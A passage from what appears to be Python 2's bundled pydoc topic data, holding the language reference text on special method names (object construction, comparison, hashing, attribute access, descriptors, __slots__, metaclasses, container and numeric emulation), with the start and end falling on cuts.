]-\n\n[1] Additional information on these special methods may be found\n in the Python Reference Manual (Basic customization).\n\n[2] As a consequence, the list "[1, 2]" is considered equal to\n "[1.0, 2.0]", and similarly for tuples.\n\n[3] They must have since the parser can\'t tell the type of the\n operands.\n\n[4] Cased characters are those with general category property\n being one of "Lu" (Letter, uppercase), "Ll" (Letter, lowercase),\n or "Lt" (Letter, titlecase).\n\n[5] To format only a tuple you should therefore provide a\n singleton tuple whose only element is the tuple to be formatted.\n\n[6] The advantage of leaving the newline on is that returning an\n empty string is then an unambiguous EOF indication. It is also\n possible (in cases where it might matter, for example, if you want\n to make an exact copy of a file while scanning its lines) to tell\n whether the last line of a file ended in a newline or not (yes\n this happens!).\n', 'specialnames': u'\nSpecial method names\n********************\n\nA class can implement certain operations that are invoked by special\nsyntax (such as arithmetic operations or subscripting and slicing) by\ndefining methods with special names. This is Python\'s approach to\n*operator overloading*, allowing classes to define their own behavior\nwith respect to language operators. For instance, if a class defines\na method named "__getitem__()", and "x" is an instance of this class,\nthen "x[i]" is roughly equivalent to "x.__getitem__(i)" for old-style\nclasses and "type(x).__getitem__(x, i)" for new-style classes. Except\nwhere mentioned, attempts to execute an operation raise an exception\nwhen no appropriate method is defined (typically "AttributeError" or\n"TypeError").\n\nWhen implementing a class that emulates any built-in type, it is\nimportant that the emulation only be implemented to the degree that it\nmakes sense for the object being modelled. For example, some\nsequences may work well with retrieval of individual elements, but\nextracting a slice may not make sense. (One example of this is the\n"NodeList" interface in the W3C\'s Document Object Model.)\n\n\nBasic customization\n===================\n\nobject.__new__(cls[, ...])\n\n Called to create a new instance of class *cls*. "__new__()" is a\n static method (special-cased so you need not declare it as such)\n that takes the class of which an instance was requested as its\n first argument. The remaining arguments are those passed to the\n object constructor expression (the call to the class). The return\n value of "__new__()" should be the new object instance (usually an\n instance of *cls*).\n\n Typical implementations create a new instance of the class by\n invoking the superclass\'s "__new__()" method using\n "super(currentclass, cls).__new__(cls[, ...])" with appropriate\n arguments and then modifying the newly-created instance as\n necessary before returning it.\n\n If "__new__()" returns an instance of *cls*, then the new\n instance\'s "__init__()" method will be invoked like\n "__init__(self[, ...])", where *self* is the new instance and the\n remaining arguments are the same as were passed to "__new__()".\n\n If "__new__()" does not return an instance of *cls*, then the new\n instance\'s "__init__()" method will not be invoked.\n\n "__new__()" is intended mainly to allow subclasses of immutable\n types (like int, str, or tuple) to customize instance creation. It\n is also commonly overridden in custom metaclasses in order to\n customize class creation.\n\nobject.__init__(self[, ...])\n\n Called after the instance has been created (by "__new__()"), but\n before it is returned to the caller. The arguments are those\n passed to the class constructor expression. If a base class has an\n "__init__()" method, the derived class\'s "__init__()" method, if\n any, must explicitly call it to ensure proper initialization of the\n base class part of the instance; for example:\n "BaseClass.__init__(self, [args...])".\n\n Because "__new__()" and "__init__()" work together in constructing\n objects ("__new__()" to create it, and "__init__()" to customise\n it), no non-"None" value may be returned by "__init__()"; doing so\n will cause a "TypeError" to be raised at runtime.\n\nobject.__del__(self)\n\n Called when the instance is about to be destroyed. This is also\n called a destructor. If a base class has a "__del__()" method, the\n derived class\'s "__del__()" method, if any, must explicitly call it\n to ensure proper deletion of the base class part of the instance.\n Note that it is possible (though not recommended!) for the\n "__del__()" method to postpone destruction of the instance by\n creating a new reference to it. It may then be called at a later\n time when this new reference is deleted. It is not guaranteed that\n "__del__()" methods are called for objects that still exist when\n the interpreter exits.\n\n Note: "del x" doesn\'t directly call "x.__del__()" --- the former\n decrements the reference count for "x" by one, and the latter is\n only called when "x"\'s reference count reaches zero. Some common\n situations that may prevent the reference count of an object from\n going to zero include: circular references between objects (e.g.,\n a doubly-linked list or a tree data structure with parent and\n child pointers); a reference to the object on the stack frame of\n a function that caught an exception (the traceback stored in\n "sys.exc_traceback" keeps the stack frame alive); or a reference\n to the object on the stack frame that raised an unhandled\n exception in interactive mode (the traceback stored in\n "sys.last_traceback" keeps the stack frame alive). The first\n situation can only be remedied by explicitly breaking the cycles;\n the latter two situations can be resolved by storing "None" in\n "sys.exc_traceback" or "sys.last_traceback". Circular references\n which are garbage are detected when the option cycle detector is\n enabled (it\'s on by default), but can only be cleaned up if there\n are no Python-level "__del__()" methods involved. Refer to the\n documentation for the "gc" module for more information about how\n "__del__()" methods are handled by the cycle detector,\n particularly the description of the "garbage" value.\n\n Warning: Due to the precarious circumstances under which\n "__del__()" methods are invoked, exceptions that occur during\n their execution are ignored, and a warning is printed to\n "sys.stderr" instead. Also, when "__del__()" is invoked in\n response to a module being deleted (e.g., when execution of the\n program is done), other globals referenced by the "__del__()"\n method may already have been deleted or in the process of being\n torn down (e.g. the import machinery shutting down). For this\n reason, "__del__()" methods should do the absolute minimum needed\n to maintain external invariants. Starting with version 1.5,\n Python guarantees that globals whose name begins with a single\n underscore are deleted from their module before other globals are\n deleted; if no other references to such globals exist, this may\n help in assuring that imported modules are still available at the\n time when the "__del__()" method is called.\n\n See also the "-R" command-line option.\n\nobject.__repr__(self)\n\n Called by the "repr()" built-in function and by string conversions\n (reverse quotes) to compute the "official" string representation of\n an object. If at all possible, this should look like a valid\n Python expression that could be used to recreate an object with the\n same value (given an appropriate environment). If this is not\n possible, a string of the form "<...some useful description...>"\n should be returned. The return value must be a string object. If a\n class defines "__repr__()" but not "__str__()", then "__repr__()"\n is also used when an "informal" string representation of instances\n of that class is required.\n\n This is typically used for debugging, so it is important that the\n representation is information-rich and unambiguous.\n\nobject.__str__(self)\n\n Called by the "str()" built-in function and by the "print"\n statement to compute the "informal" string representation of an\n object. This differs from "__repr__()" in that it does not have to\n be a valid Python expression: a more convenient or concise\n representation may be used instead. The return value must be a\n string object.\n\nobject.__lt__(self, other)\nobject.__le__(self, other)\nobject.__eq__(self, other)\nobject.__ne__(self, other)\nobject.__gt__(self, other)\nobject.__ge__(self, other)\n\n New in version 2.1.\n\n These are the so-called "rich comparison" methods, and are called\n for comparison operators in preference to "__cmp__()" below. The\n correspondence between operator symbols and method names is as\n follows: "x<y" calls "x.__lt__(y)", "x<=y" calls "x.__le__(y)",\n "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call "x.__ne__(y)",\n "x>y" calls "x.__gt__(y)", and "x>=y" calls "x.__ge__(y)".\n\n A rich comparison method may return the singleton "NotImplemented"\n if it does not implement the operation for a given pair of\n arguments. By convention, "False" and "True" are returned for a\n successful comparison. However, these methods can return any value,\n so if the comparison operator is used in a Boolean context (e.g.,\n in the condition of an "if" statement), Python will call "bool()"\n on the value to determine if the result is true or false.\n\n There are no implied relationships among the comparison operators.\n The truth of "x==y" does not imply that "x!=y" is false.\n Accordingly, when defining "__eq__()", one should also define\n "__ne__()" so that the operators will behave as expected. See the\n paragraph on "__hash__()" for some important notes on creating\n *hashable* objects which support custom comparison operations and\n are usable as dictionary keys.\n\n There are no swapped-argument versions of these methods (to be used\n when the left argument does not support the operation but the right\n argument does); rather, "__lt__()" and "__gt__()" are each other\'s\n reflection, "__le__()" and "__ge__()" are each other\'s reflection,\n and "__eq__()" and "__ne__()" are their own reflection.\n\n Arguments to rich comparison methods are never coerced.\n\n To automatically generate ordering operations from a single root\n operation, see "functools.total_ordering()".\n\nobject.__cmp__(self, other)\n\n Called by comparison operations if rich comparison (see above) is\n not defined. Should return a negative integer if "self < other",\n zero if "self == other", a positive integer if "self > other". If\n no "__cmp__()", "__eq__()" or "__ne__()" operation is defined,\n class instances are compared by object identity ("address"). See\n also the description of "__hash__()" for some important notes on\n creating *hashable* objects which support custom comparison\n operations and are usable as dictionary keys. (Note: the\n restriction that exceptions are not propagated by "__cmp__()" has\n been removed since Python 1.5.)\n\nobject.__rcmp__(self, other)\n\n Changed in version 2.1: No longer supported.\n\nobject.__hash__(self)\n\n Called by built-in function "hash()" and for operations on members\n of hashed collections including "set", "frozenset", and "dict".\n "__hash__()" should return an integer. The only required property\n is that objects which compare equal have the same hash value; it is\n advised to somehow mix together (e.g. using exclusive or) the hash\n values for the components of the object that also play a part in\n comparison of objects.\n\n If a class does not define a "__cmp__()" or "__eq__()" method it\n should not define a "__hash__()" operation either; if it defines\n "__cmp__()" or "__eq__()" but not "__hash__()", its instances will\n not be usable in hashed collections. If a class defines mutable\n objects and implements a "__cmp__()" or "__eq__()" method, it\n should not implement "__hash__()", since hashable collection\n implementations require that a object\'s hash value is immutable (if\n the object\'s hash value changes, it will be in the wrong hash\n bucket).\n\n User-defined classes have "__cmp__()" and "__hash__()" methods by\n default; with them, all objects compare unequal (except with\n themselves) and "x.__hash__()" returns a result derived from\n "id(x)".\n\n Classes which inherit a "__hash__()" method from a parent class but\n change the meaning of "__cmp__()" or "__eq__()" such that the hash\n value returned is no longer appropriate (e.g. by switching to a\n value-based concept of equality instead of the default identity\n based equality) can explicitly flag themselves as being unhashable\n by setting "__hash__ = None" in the class definition. Doing so\n means that not only will instances of the class raise an\n appropriate "TypeError" when a program attempts to retrieve their\n hash value, but they will also be correctly identified as\n unhashable when checking "isinstance(obj, collections.Hashable)"\n (unlike classes which define their own "__hash__()" to explicitly\n raise "TypeError").\n\n Changed in version 2.5: "__hash__()" may now also return a long\n integer object; the 32-bit integer is then derived from the hash of\n that object.\n\n Changed in version 2.6: "__hash__" may now be set to "None" to\n explicitly flag instances of a class as unhashable.\n\nobject.__nonzero__(self)\n\n Called to implement truth value testing and the built-in operation\n "bool()"; should return "False" or "True", or their integer\n equivalents "0" or "1". When this method is not defined,\n "__len__()" is called, if it is defined, and the object is\n considered true if its result is nonzero. If a class defines\n neither "__len__()" nor "__nonzero__()", all its instances are\n considered true.\n\nobject.__unicode__(self)\n\n Called to implement "unicode()" built-in; should return a Unicode\n object. When this method is not defined, string conversion is\n attempted, and the result of string conversion is converted to\n Unicode using the system default encoding.\n\n\nCustomizing attribute access\n============================\n\nThe following methods can be defined to customize the meaning of\nattribute access (use of, assignment to, or deletion of "x.name") for\nclass instances.\n\nobject.__getattr__(self, name)\n\n Called when an attribute lookup has not found the attribute in the\n usual places (i.e. it is not an instance attribute nor is it found\n in the class tree for "self"). "name" is the attribute name. This\n method should return the (computed) attribute value or raise an\n "AttributeError" exception.\n\n Note that if the attribute is found through the normal mechanism,\n "__getattr__()" is not called. (This is an intentional asymmetry\n between "__getattr__()" and "__setattr__()".) This is done both for\n efficiency reasons and because otherwise "__getattr__()" would have\n no way to access other attributes of the instance. Note that at\n least for instance variables, you can fake total control by not\n inserting any values in the instance attribute dictionary (but\n instead inserting them in another object). See the\n "__getattribute__()" method below for a way to actually get total\n control in new-style classes.\n\nobject.__setattr__(self, name, value)\n\n Called when an attribute assignment is attempted. This is called\n instead of the normal mechanism (i.e. store the value in the\n instance dictionary). *name* is the attribute name, *value* is the\n value to be assigned to it.\n\n If "__setattr__()" wants to assign to an instance attribute, it\n should not simply execute "self.name = value" --- this would cause\n a recursive call to itself. Instead, it should insert the value in\n the dictionary of instance attributes, e.g., "self.__dict__[name] =\n value". For new-style classes, rather than accessing the instance\n dictionary, it should call the base class method with the same\n name, for example, "object.__setattr__(self, name, value)".\n\nobject.__delattr__(self, name)\n\n Like "__setattr__()" but for attribute deletion instead of\n assignment. This should only be implemented if "del obj.name" is\n meaningful for the object.\n\n\nMore attribute access for new-style classes\n-------------------------------------------\n\nThe following methods only apply to new-style classes.\n\nobject.__getattribute__(self, name)\n\n Called unconditionally to implement attribute accesses for\n instances of the class. If the class also defines "__getattr__()",\n the latter will not be called unless "__getattribute__()" either\n calls it explicitly or raises an "AttributeError". This method\n should return the (computed) attribute value or raise an\n "AttributeError" exception. In order to avoid infinite recursion in\n this method, its implementation should always call the base class\n method with the same name to access any attributes it needs, for\n example, "object.__getattribute__(self, name)".\n\n Note: This method may still be bypassed when looking up special\n methods as the result of implicit invocation via language syntax\n or built-in functions. See Special method lookup for new-style\n classes.\n\n\nImplementing Descriptors\n------------------------\n\nThe following methods only apply when an instance of the class\ncontaining the method (a so-called *descriptor* class) appears in an\n*owner* class (the descriptor must be in either the owner\'s class\ndictionary or in the class dictionary for one of its parents). In the\nexamples below, "the attribute" refers to the attribute whose name is\nthe key of the property in the owner class\' "__dict__".\n\nobject.__get__(self, instance, owner)\n\n Called to get the attribute of the owner class (class attribute\n access) or of an instance of that class (instance attribute\n access). *owner* is always the owner class, while *instance* is the\n instance that the attribute was accessed through, or "None" when\n the attribute is accessed through the *owner*. This method should\n return the (computed) attribute value or raise an "AttributeError"\n exception.\n\nobject.__set__(self, instance, value)\n\n Called to set the attribute on an instance *instance* of the owner\n class to a new value, *value*.\n\nobject.__delete__(self, instance)\n\n Called to delete the attribute on an instance *instance* of the\n owner class.\n\n\nInvoking Descriptors\n--------------------\n\nIn general, a descriptor is an object attribute with "binding\nbehavior", one whose attribute access has been overridden by methods\nin the descriptor protocol: "__get__()", "__set__()", and\n"__delete__()". If any of those methods are defined for an object, it\nis said to be a descriptor.\n\nThe default behavior for attribute access is to get, set, or delete\nthe attribute from an object\'s dictionary. For instance, "a.x" has a\nlookup chain starting with "a.__dict__[\'x\']", then\n"type(a).__dict__[\'x\']", and continuing through the base classes of\n"type(a)" excluding metaclasses.\n\nHowever, if the looked-up value is an object defining one of the\ndescriptor methods, then Python may override the default behavior and\ninvoke the descriptor method instead. Where this occurs in the\nprecedence chain depends on which descriptor methods were defined and\nhow they were called. Note that descriptors are only invoked for new\nstyle objects or classes (ones that subclass "object()" or "type()").\n\nThe starting point for descriptor invocation is a binding, "a.x". How\nthe arguments are assembled depends on "a":\n\nDirect Call\n The simplest and least common call is when user code directly\n invokes a descriptor method: "x.__get__(a)".\n\nInstance Binding\n If binding to a new-style object instance, "a.x" is transformed\n into the call: "type(a).__dict__[\'x\'].__get__(a, type(a))".\n\nClass Binding\n If binding to a new-style class, "A.x" is transformed into the\n call: "A.__dict__[\'x\'].__get__(None, A)".\n\nSuper Binding\n If "a" is an instance of "super", then the binding "super(B,\n obj).m()" searches "obj.__class__.__mro__" for the base class "A"\n immediately preceding "B" and then invokes the descriptor with the\n call: "A.__dict__[\'m\'].__get__(obj, obj.__class__)".\n\nFor instance bindings, the precedence of descriptor invocation depends\non the which descriptor methods are defined. A descriptor can define\nany combination of "__get__()", "__set__()" and "__delete__()". If it\ndoes not define "__get__()", then accessing the attribute will return\nthe descriptor object itself unless there is a value in the object\'s\ninstance dictionary. If the descriptor defines "__set__()" and/or\n"__delete__()", it is a data descriptor; if it defines neither, it is\na non-data descriptor. Normally, data descriptors define both\n"__get__()" and "__set__()", while non-data descriptors have just the\n"__get__()" method. Data descriptors with "__set__()" and "__get__()"\ndefined always override a redefinition in an instance dictionary. In\ncontrast, non-data descriptors can be overridden by instances.\n\nPython methods (including "staticmethod()" and "classmethod()") are\nimplemented as non-data descriptors. Accordingly, instances can\nredefine and override methods. This allows individual instances to\nacquire behaviors that differ from other instances of the same class.\n\nThe "property()" function is implemented as a data descriptor.\nAccordingly, instances cannot override the behavior of a property.\n\n\n__slots__\n---------\n\nBy default, instances of both old and new-style classes have a\ndictionary for attribute storage. This wastes space for objects\nhaving very few instance variables. The space consumption can become\nacute when creating large numbers of instances.\n\nThe default can be overridden by defining *__slots__* in a new-style\nclass definition. The *__slots__* declaration takes a sequence of\ninstance variables and reserves just enough space in each instance to\nhold a value for each variable. Space is saved because *__dict__* is\nnot created for each instance.\n\n__slots__\n\n This class variable can be assigned a string, iterable, or sequence\n of strings with variable names used by instances. If defined in a\n new-style class, *__slots__* reserves space for the declared\n variables and prevents the automatic creation of *__dict__* and\n *__weakref__* for each instance.\n\n New in version 2.2.\n\nNotes on using *__slots__*\n\n* When inheriting from a class without *__slots__*, the *__dict__*\n attribute of that class will always be accessible, so a *__slots__*\n definition in the subclass is meaningless.\n\n* Without a *__dict__* variable, instances cannot be assigned new\n variables not listed in the *__slots__* definition. Attempts to\n assign to an unlisted variable name raises "AttributeError". If\n dynamic assignment of new variables is desired, then add\n "\'__dict__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__dict__\'" to the\n *__slots__* declaration would not enable the assignment of new\n attributes not specifically listed in the sequence of instance\n variable names.\n\n* Without a *__weakref__* variable for each instance, classes\n defining *__slots__* do not support weak references to its\n instances. If weak reference support is needed, then add\n "\'__weakref__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__weakref__\'" to the\n *__slots__* declaration would not enable support for weak\n references.\n\n* *__slots__* are implemented at the class level by creating\n descriptors (Implementing Descriptors) for each variable name. As a\n result, class attributes cannot be used to set default values for\n instance variables defined by *__slots__*; otherwise, the class\n attribute would overwrite the descriptor assignment.\n\n* The action of a *__slots__* declaration is limited to the class\n where it is defined. As a result, subclasses will have a *__dict__*\n unless they also define *__slots__* (which must only contain names\n of any *additional* slots).\n\n* If a class defines a slot also defined in a base class, the\n instance variable defined by the base class slot is inaccessible\n (except by retrieving its descriptor directly from the base class).\n This renders the meaning of the program undefined. In the future, a\n check may be added to prevent this.\n\n* Nonempty *__slots__* does not work for classes derived from\n "variable-length" built-in types such as "long", "str" and "tuple".\n\n* Any non-string iterable may be assigned to *__slots__*. Mappings\n may also be used; however, in the future, special meaning may be\n assigned to the values corresponding to each key.\n\n* *__class__* assignment works only if both classes have the same\n *__slots__*.\n\n Changed in version 2.6: Previously, *__class__* assignment raised an\n error if either new or old class had *__slots__*.\n\n\nCustomizing class creation\n==========================\n\nBy default, new-style classes are constructed using "type()". A class\ndefinition is read into a separate namespace and the value of class\nname is bound to the result of "type(name, bases, dict)".\n\nWhen the class definition is read, if *__metaclass__* is defined then\nthe callable assigned to it will be called instead of "type()". This\nallows classes or functions to be written which monitor or alter the\nclass creation process:\n\n* Modifying the class dictionary prior to the class being created.\n\n* Returning an instance of another class -- essentially performing\n the role of a factory function.\n\nThese steps will have to be performed in the metaclass\'s "__new__()"\nmethod -- "type.__new__()" can then be called from this method to\ncreate a class with different properties. This example adds a new\nelement to the class dictionary before creating the class:\n\n class metacls(type):\n def __new__(mcs, name, bases, dict):\n dict[\'foo\'] = \'metacls was here\'\n return type.__new__(mcs, name, bases, dict)\n\nYou can of course also override other class methods (or add new\nmethods); for example defining a custom "__call__()" method in the\nmetaclass allows custom behavior when the class is called, e.g. not\nalways creating a new instance.\n\n__metaclass__\n\n This variable can be any callable accepting arguments for "name",\n "bases", and "dict". Upon class creation, the callable is used\n instead of the built-in "type()".\n\n New in version 2.2.\n\nThe appropriate metaclass is determined by the following precedence\nrules:\n\n* If "dict[\'__metaclass__\']" exists, it is used.\n\n* Otherwise, if there is at least one base class, its metaclass is\n used (this looks for a *__class__* attribute first and if not found,\n uses its type).\n\n* Otherwise, if a global variable named __metaclass__ exists, it is\n used.\n\n* Otherwise, the old-style, classic metaclass (types.ClassType) is\n used.\n\nThe potential uses for metaclasses are boundless. Some ideas that have\nbeen explored including logging, interface checking, automatic\ndelegation, automatic property creation, proxies, frameworks, and\nautomatic resource locking/synchronization.\n\n\nCustomizing instance and subclass checks\n========================================\n\nNew in version 2.6.\n\nThe following methods are used to override the default behavior of the\n"isinstance()" and "issubclass()" built-in functions.\n\nIn particular, the metaclass "abc.ABCMeta" implements these methods in\norder to allow the addition of Abstract Base Classes (ABCs) as\n"virtual base classes" to any class or type (including built-in\ntypes), including other ABCs.\n\nclass.__instancecheck__(self, instance)\n\n Return true if *instance* should be considered a (direct or\n indirect) instance of *class*. If defined, called to implement\n "isinstance(instance, class)".\n\nclass.__subclasscheck__(self, subclass)\n\n Return true if *subclass* should be considered a (direct or\n indirect) subclass of *class*. If defined, called to implement\n "issubclass(subclass, class)".\n\nNote that these methods are looked up on the type (metaclass) of a\nclass. They cannot be defined as class methods in the actual class.\nThis is consistent with the lookup of special methods that are called\non instances, only in this case the instance is itself a class.\n\nSee also:\n\n **PEP 3119** - Introducing Abstract Base Classes\n Includes the specification for customizing "isinstance()" and\n "issubclass()" behavior through "__instancecheck__()" and\n "__subclasscheck__()", with motivation for this functionality in\n the context of adding Abstract Base Classes (see the "abc"\n module) to the language.\n\n\nEmulating callable objects\n==========================\n\nobject.__call__(self[, args...])\n\n Called when the instance is "called" as a function; if this method\n is defined, "x(arg1, arg2, ...)" is a shorthand for\n "x.__call__(arg1, arg2, ...)".\n\n\nEmulating container types\n=========================\n\nThe following methods can be defined to implement container objects.\nContainers usually are sequences (such as lists or tuples) or mappings\n(like dictionaries), but can represent other containers as well. The\nfirst set of methods is used either to emulate a sequence or to\nemulate a mapping; the difference is that for a sequence, the\nallowable keys should be the integers *k* for which "0 <= k < N" where\n*N* is the length of the sequence, or slice objects, which define a\nrange of items. (For backwards compatibility, the method\n"__getslice__()" (see below) can also be defined to handle simple, but\nnot extended slices.) It is also recommended that mappings provide the\nmethods "keys()", "values()", "items()", "has_key()", "get()",\n"clear()", "setdefault()", "iterkeys()", "itervalues()",\n"iteritems()", "pop()", "popitem()", "copy()", and "update()" behaving\nsimilar to those for Python\'s standard dictionary objects. The\n"UserDict" module provides a "DictMixin" class to help create those\nmethods from a base set of "__getitem__()", "__setitem__()",\n"__delitem__()", and "keys()". Mutable sequences should provide\nmethods "append()", "count()", "index()", "extend()", "insert()",\n"pop()", "remove()", "reverse()" and "sort()", like Python standard\nlist objects. Finally, sequence types should implement addition\n(meaning concatenation) and multiplication (meaning repetition) by\ndefining the methods "__add__()", "__radd__()", "__iadd__()",\n"__mul__()", "__rmul__()" and "__imul__()" described below; they\nshould not define "__coerce__()" or other numerical operators. It is\nrecommended that both mappings and sequences implement the\n"__contains__()" method to allow efficient use of the "in" operator;\nfor mappings, "in" should be equivalent of "has_key()"; for sequences,\nit should search through the values. It is further recommended that\nboth mappings and sequences implement the "__iter__()" method to allow\nefficient iteration through the container; for mappings, "__iter__()"\nshould be the same as "iterkeys()"; for sequences, it should iterate\nthrough the values.\n\nobject.__len__(self)\n\n Called to implement the built-in function "len()". Should return\n the length of the object, an integer ">=" 0. Also, an object that\n doesn\'t define a "__nonzero__()" method and whose "__len__()"\n method returns zero is considered to be false in a Boolean context.\n\nobject.__getitem__(self, key)\n\n Called to implement evaluation of "self[key]". For sequence types,\n the accepted keys should be integers and slice objects. Note that\n the special interpretation of negative indexes (if the class wishes\n to emulate a sequence type) is up to the "__getitem__()" method. If\n *key* is of an inappropriate type, "TypeError" may be raised; if of\n a value outside the set of indexes for the sequence (after any\n special interpretation of negative values), "IndexError" should be\n raised. For mapping types, if *key* is missing (not in the\n container), "KeyError" should be raised.\n\n Note: "for" loops expect that an "IndexError" will be raised for\n illegal indexes to allow proper detection of the end of the\n sequence.\n\nobject.__missing__(self, key)\n\n Called by "dict"."__getitem__()" to implement "self[key]" for dict\n subclasses when key is not in the dictionary.\n\nobject.__setitem__(self, key, value)\n\n Called to implement assignment to "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support changes to the values for keys, or if new keys\n can be added, or for sequences if elements can be replaced. The\n same exceptions should be raised for improper *key* values as for\n the "__getitem__()" method.\n\nobject.__delitem__(self, key)\n\n Called to implement deletion of "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support removal of keys, or for sequences if elements\n can be removed from the sequence. The same exceptions should be\n raised for improper *key* values as for the "__getitem__()" method.\n\nobject.__iter__(self)\n\n This method is called when an iterator is required for a container.\n This method should return a new iterator object that can iterate\n over all the objects in the container. For mappings, it should\n iterate over the keys of the container, and should also be made\n available as the method "iterkeys()".\n\n Iterator objects also need to implement this method; they are\n required to return themselves. For more information on iterator\n objects, see Iterator Types.\n\nobject.__reversed__(self)\n\n Called (if present) by the "reversed()" built-in to implement\n reverse iteration. It should return a new iterator object that\n iterates over all the objects in the container in reverse order.\n\n If the "__reversed__()" method is not provided, the "reversed()"\n built-in will fall back to using the sequence protocol ("__len__()"\n and "__getitem__()"). Objects that support the sequence protocol\n should only provide "__reversed__()" if they can provide an\n implementation that is more efficient than the one provided by\n "reversed()".\n\n New in version 2.6.\n\nThe membership test operators ("in" and "not in") are normally\nimplemented as an iteration through a sequence. However, container\nobjects can supply the following special method with a more efficient\nimplementation, which also does not require the object be a sequence.\n\nobject.__contains__(self, item)\n\n Called to implement membership test operators. Should return true\n if *item* is in *self*, false otherwise. For mapping objects, this\n should consider the keys of the mapping rather than the values or\n the key-item pairs.\n\n For objects that don\'t define "__contains__()", the membership test\n first tries iteration via "__iter__()", then the old sequence\n iteration protocol via "__getitem__()", see this section in the\n language reference.\n\n\nAdditional methods for emulation of sequence types\n==================================================\n\nThe following optional methods can be defined to further emulate\nsequence objects. Immutable sequences methods should at most only\ndefine "__getslice__()"; mutable sequences might define all three\nmethods.\n\nobject.__getslice__(self, i, j)\n\n Deprecated since version 2.0: Support slice objects as parameters\n to the "__getitem__()" method. (However, built-in types in CPython\n currently still implement "__getslice__()". Therefore, you have to\n override it in derived classes when implementing slicing.)\n\n Called to implement evaluation of "self[i:j]". The returned object\n should be of the same type as *self*. Note that missing *i* or *j*\n in the slice expression are replaced by zero or "sys.maxsize",\n respectively. If negative indexes are used in the slice, the\n length of the sequence is added to that index. If the instance does\n not implement the "__len__()" method, an "AttributeError" is\n raised. No guarantee is made that indexes adjusted this way are not\n still negative. Indexes which are greater than the length of the\n sequence are not modified. If no "__getslice__()" is found, a slice\n object is created instead, and passed to "__getitem__()" instead.\n\nobject.__setslice__(self, i, j, sequence)\n\n Called to implement assignment to "self[i:j]". Same notes for *i*\n and *j* as for "__getslice__()".\n\n This method is deprecated. If no "__setslice__()" is found, or for\n extended slicing of the form "self[i:j:k]", a slice object is\n created, and passed to "__setitem__()", instead of "__setslice__()"\n being called.\n\nobject.__delslice__(self, i, j)\n\n Called to implement deletion of "self[i:j]". Same notes for *i* and\n *j* as for "__getslice__()". This method is deprecated. If no\n "__delslice__()" is found, or for extended slicing of the form\n "self[i:j:k]", a slice object is created, and passed to\n "__delitem__()", instead of "__delslice__()" being called.\n\nNotice that these methods are only invoked when a single slice with a\nsingle colon is used, and the slice method is available. For slice\noperations involving extended slice notation, or in absence of the\nslice methods, "__getitem__()", "__setitem__()" or "__delitem__()" is\ncalled with a slice object as argument.\n\nThe following example demonstrate how to make your program or module\ncompatible with earlier versions of Python (assuming that methods\n"__getitem__()", "__setitem__()" and "__delitem__()" support slice\nobjects as arguments):\n\n class MyClass:\n ...\n def __getitem__(self, index):\n ...\n def __setitem__(self, index, value):\n ...\n def __delitem__(self, index):\n ...\n\n if sys.version_info < (2, 0):\n # They won\'t be defined if version is at least 2.0 final\n\n def __getslice__(self, i, j):\n return self[max(0, i):max(0, j):]\n def __setslice__(self, i, j, seq):\n self[max(0, i):max(0, j):] = seq\n def __delslice__(self, i, j):\n del self[max(0, i):max(0, j):]\n ...\n\nNote the calls to "max()"; these are necessary because of the handling\nof negative indices before the "__*slice__()" methods are called.\nWhen negative indexes are used, the "__*item__()" methods receive them\nas provided, but the "__*slice__()" methods get a "cooked" form of the\nindex values. For each negative index value, the length of the\nsequence is added to the index before calling the method (which may\nstill result in a negative index); this is the customary handling of\nnegative indexes by the built-in sequence types, and the "__*item__()"\nmethods are expected to do this as well. However, since they should\nalready be doing that, negative indexes cannot be passed in; they must\nbe constrained to the bounds of the sequence before being passed to\nthe "__*item__()" methods. Calling "max(0, i)" conveniently returns\nthe proper value.\n\n\nEmulating numeric types\n=======================\n\nThe following methods can be defined to emulate numeric objects.\nMethods corresponding to operations that are not supported by the\nparticular kind of number implemented (e.g., bitwise operations for\nnon-integral numbers) should be left undefined.\n\nobject.__add__(self, other)\nobject.__sub__(self, other)\nobject.__mul__(self, other)\nobject.__floordiv__(self, other)\nobject.__mod__(self, other)\nobject.__divmod__(self, other)\nobject.__pow__(self, other[, modulo])\nobject.__lshift__(self, other)\nobject.__rshift__(self, other)\nobject.__and__(self, other)\nobject.__xor__(self, other)\nobject.__or__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "//", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|"). For instance, to evaluate the\n expression "x + y", where *x* is an instance of a class that has an\n "__add__()" method, "x.__add__(y)" is called. The "__divmod__()"\n method should be the equivalent to using "__floordiv__()" and\n "__mod__()"; it should not be related to "__truediv__()" (described\n below). Note that "__pow__()" should be defined to accept an\n optional third argument if the ternary version of the built-in\n "pow()" function is to be supported.\n\n If one of those methods does not support the operation with the\n supplied arguments, it should return "NotImplemented".\n\nobject.__div__(self, other)\nobject.__truediv__(self, other)\n\n The division operator ("/") is implemented by these methods. The\n "__truediv__()" method is used when "__future__.division" is in\n effect, otherwise "__div__()" is used. If only one of these two\n methods is defined, the object will not support division in the\n alternate context; "TypeError" will be raised instead.\n\nobject.__radd__(self, other)\nobject.__rsub__(self, other)\nobject.__rmul__(self, other)\nobject.__rdiv__(self, other)\nobject.__rtruediv__(self, other)\nobject.__rfloordiv__(self, other)\nobject.__rmod__(self, other)\nobject.__rdivmod__(self, other)\nobject.__rpow__(self, other)\nobject.__rlshift__(self, other)\nobject.__rrshift__(self, other)\nobject.__rand__(self, other)\nobject.__rxor__(self, other)\nobject.__ror__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "/", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|") with reflected (swapped) operands.\n These functions are only called if the left operand does not\n support the corresponding operation and the operands are of\n different types. [2] For instance, to evaluate the expression "x -\n y", where *y* is an instance of a class that has an "__rsub__()"\n method, "y.__rsub__(x)" is called if "x.__sub__(y)" returns\n *NotImplemented*.\n\n Note that ternary "pow()" will not try calling "__rpow__()" (the\n coercion rules would become too complicated).\n\n Note: If the right operand\'s type is a subclass of the left\n operand\'s type and that subclass provides the reflected method\n for the operation, this method will be called before the left\n operand\'s non-reflected method. This behavior allows subclasses\n to override their ancestors\' operations.\n\nobject.__iadd__(self, other)\nobject.__isub__(self, other)\nobject.__imul__(self, 